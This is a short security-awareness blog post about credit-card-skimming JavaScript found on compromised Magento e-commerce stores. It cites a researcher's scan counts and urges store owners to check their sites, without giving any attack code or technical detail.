And now The Great Magento will saw your bank balance in half

Most of us will not have heard of Magento, but we should have.

Magento is an extremely popular eCommerce solution used globally by thousands of retailers big and small. The trouble as usual with these solutions is that many online retailers do not have the time, the inclination or the skills to regularly patch their sites, often leaving administration in the hands of third parties with no SLAs or even well defined service parameters.

Yesterday we met with a number of very large UK based retailers who were discussing this very issue across smaller retailers. Serendipity strikes again.

Amsterdam based security researcher Willem de Groot has been scanning the Interwebs for a number of years looking for stores that are compromised to steal credit card details as they are entered online and ship them off to (guess where…) a Russian collection site to be grouped and sold on the Dark Web (mwahahaha) for $30 per card.

Here are his latest results:

Nov-15 3501
Mar-16 4476 28%
Sep-16 5925 69%

It seems that this scam works by injecting JavaScript into the website. There appear to be 9 varieties of malware in 3 distinct families with varying levels of sophistication and obfuscation.

This is very worrying for online safety and even though Google are doing something about it by blocking some of the malware on the Chrome Safe Browsing Blacklist, much of it remains undetected, unblocked and ready to harvest.

Mr de Groot has some great advice for compromised sites at his excellent blog on the subject here.

The most useful tip he has is for providers using Magento to check the status of their online presence using a free online service at: You could even use this tool to check the status of a boutique store you may be thinking of using, if you were an untrusting cynic like us!

When advised about their stores being vulnerable, some of the reported comments are almost amusing. Our favourite being “Thanks for your suggestion, but our shop is totally safe. There is just an annoying JavaScript error”.

If you run an online store, or have a friend who does, please check it out and advise them to look at de Groot’s blog.

As well as public awareness, another good thing to come from this announcement is that it stopped this blog being about Microsoft’s new policy of delivering all security patches in bundled form so you have to implement them all and can’t selectively test them for compatibility issues. Even writing that brought on a bout of yawning.  Consider yourselves lucky.

If you would like to discuss online security or any information security issues, please contact us at: [email protected] or call us on 020 7517 3900.